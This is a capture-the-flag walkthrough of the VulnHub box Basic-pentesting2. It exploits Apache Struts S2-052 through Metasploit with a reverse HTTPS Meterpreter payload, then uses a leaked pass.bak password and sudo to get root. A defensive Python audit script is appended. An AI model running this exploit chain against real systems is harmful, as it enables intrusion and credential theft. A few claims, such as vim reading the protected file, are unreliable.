Basic-pentesting2 VulnHub machine walkthrough

Preface

I'd call this box medium difficulty; the main issue is that it has quite a few pitfalls, and since I had never touched tomcat before it was somewhat hard, but I still managed to solve it, and it didn't take much time.

Download link

https://www.vulnhub.com/entry/basic-pentesting-2,241/

Information gathering

As usual, first scan to see what services this server has open.

We can see two services, ssh and apache. Open the website and see what's there.

Very bare-bones... Viewing the source reveals nothing hidden, so I first used burpsuite to enumerate subdirectories and see whether there are any other directories.

Found a directory named development containing two txt files; open them one by one.

The content of figure 2 roughly says that shadow has a weak password or the like and, to prevent brute-forcing, please change it as soon as possible. I tried brute-forcing it with a tool and got no result; maybe my wordlist is just too poor. Never mind, look at figure 1. Figure 1 says he has recently been working on a struts setup, and because all the earlier versions had problems, the version in use is 2.5.12. I'm not sure how to translate the REST part; it is a plugin for tomcat functionality, I suppose. In the nmap scan above we saw ports 8080 and 8009, which confirms it is tomcat, so first visit 8080.

After googling struts REST version 2.5.12, I found the corresponding vulnerability S2-052. First check whether the path exists: after entering the link http://192.168.1.109:8080/struts2-rest-showcase-2.5.12/ I saw the following content, which shows the vulnerability is present.

Note here that in the tutorials online the path is /struts2-rest-showcase, while this machine's path has -2.5.12 appended; I only succeeded after remembering the version number and adding it on a hunch.

S2-052 exploitation

After finding the exploit module on github, import it into metasploit.

msf exploit(e) > show options

Module options (exploit/e):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.109                    yes       The target address
   RPORT      8080                             yes       The target port (TCP)
   SRVHOST    0.0.0.0                          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                             yes       The local port to listen on.
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase-2.5.12/orders/3  yes       Path to Struts app
   URIPATH                                     no        The URI to use for this exploit (default is random)
   VHOST                                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.201    yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Apache Struts 2.5 - 2.5.12

After running exploit, we successfully get a shell.

meterpreter > shell
id
Process 1422 created.
Channel 1 created.
uid=999(tomcat9) gid=999(tomcat9) groups=999(tomcat9)

That counts as successful exploitation; next comes privilege escalation, because the privileges are too low to enter the root directory.

tomcat9@basic2:/home/kay$ ls -al
ls -al
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23 15:38 .
drwxr-xr-x 4 root root 4096 Apr 19 13:50 ..
-rw------- 1 kay  kay   756 Apr 23 16:06 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17 12:59 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17 12:59 .bashrc
drwx------ 2 kay  kay  4096 Apr 17 13:05 .cache
-rw------- 1 root kay   119 Apr 23 15:38 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23 14:50 .nano
-rw------- 1 kay  kay    57 Apr 23 15:08 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17 12:59 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23 15:05 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17 13:05 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23 15:32 .viminfo
tomcat9@basic2:/home/kay$

After entering user kay's directory, I saw the pass.bak file. Since the tomcat user has no permission to cat it, there is a small trick here: use vim to open the file read-only.

tomcat9@basic2:/home/kay$ vim pass.bak

The file content is the password, which is far more complex than mine. Respect.

Now that we know kay's password, just log in as kay via ssh.

root@Elapse:~# ssh kay@192.168.1.109
The authenticity of host '192.168.1.109 (192.168.1.109)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.109' (ECDSA) to the list of known hosts.
kay@192.168.1.109's password: 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$

ls -al shows the directory contains a .sudo_as_admin_successful file, which means we can switch to the root user directly with kay's own password.

kay@basic2:~$ sudo su
[sudo] password for kay: 
root@basic2:/home/kay#

Success; next just cat /root/flag.txt.
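As an added example (not code from the original post), here is a small audit script that parses a home directory's ls -al listing and flags the two weaknesses the pass.bak and sudo steps above relied on: credential-looking files that other local users (such as a service account like tomcat9) can read, and the .sudo_as_admin_successful marker that turns a leaked user password into a root password. The sample listing is constructed from the page's output, with pass.bak made world-readable so that the high-severity check fires; the Finding class and audit_home_listing function are my own names.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the /home/kay listing from the walkthrough, except
# that pass.bak is made world-readable (-rw-r--r--) so the severest check fires.
SAMPLE_LISTING = """\
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23 15:38 .
drwxr-xr-x 4 root root 4096 Apr 19 13:50 ..
-rw------- 1 kay  kay   756 Apr 23 16:06 .bash_history
-rw-r--r-- 1 kay  kay  3771 Apr 17 12:59 .bashrc
-rw-r--r-- 1 kay  kay    57 Apr 23 15:08 pass.bak
drwxr-xr-x 2 kay  kay  4096 Apr 23 15:05 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17 13:05 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23 15:32 .viminfo
"""

# type, 9 permission bits, links, owner, group, size, month, day, time/year, name
LS_LINE = re.compile(r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(.+)$")
SECRET_NAME = re.compile(r"(pass|passwd|cred|secret|\.bak$)", re.IGNORECASE)

@dataclass
class Finding:
    severity: str
    name: str
    reason: str

def audit_home_listing(listing: str) -> list[Finding]:
    """Parse `ls -al` output and flag readable credential files and sudo markers."""
    findings = []
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue  # skips "total 48" and anything unparsable
        ftype, perms, owner, group, name = m.groups()
        if name in (".", ".."):
            continue
        group_read = perms[3] == "r"   # bits: owner 0-2, group 3-5, others 6-8
        others_read = perms[6] == "r"
        if ftype == "-" and SECRET_NAME.search(name):
            if others_read:
                findings.append(Finding("high", name, "credential-looking file readable by any local user"))
            else:
                findings.append(Finding("medium", name, "credential-looking file in home; move to a secret store and rotate"))
        if name == ".sudo_as_admin_successful":
            findings.append(Finding("high", name, "account has used sudo: a leaked password for it is a root password"))
        if name == ".ssh" and ftype == "d" and (group_read or others_read):
            findings.append(Finding("low", name, ".ssh readable by group/others; should be mode 700"))
    return findings
```

Run it over the real listing with `for f in audit_home_listing(SAMPLE_LISTING): print(f)`; the same parser works on any `ls -al` output captured from a host.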
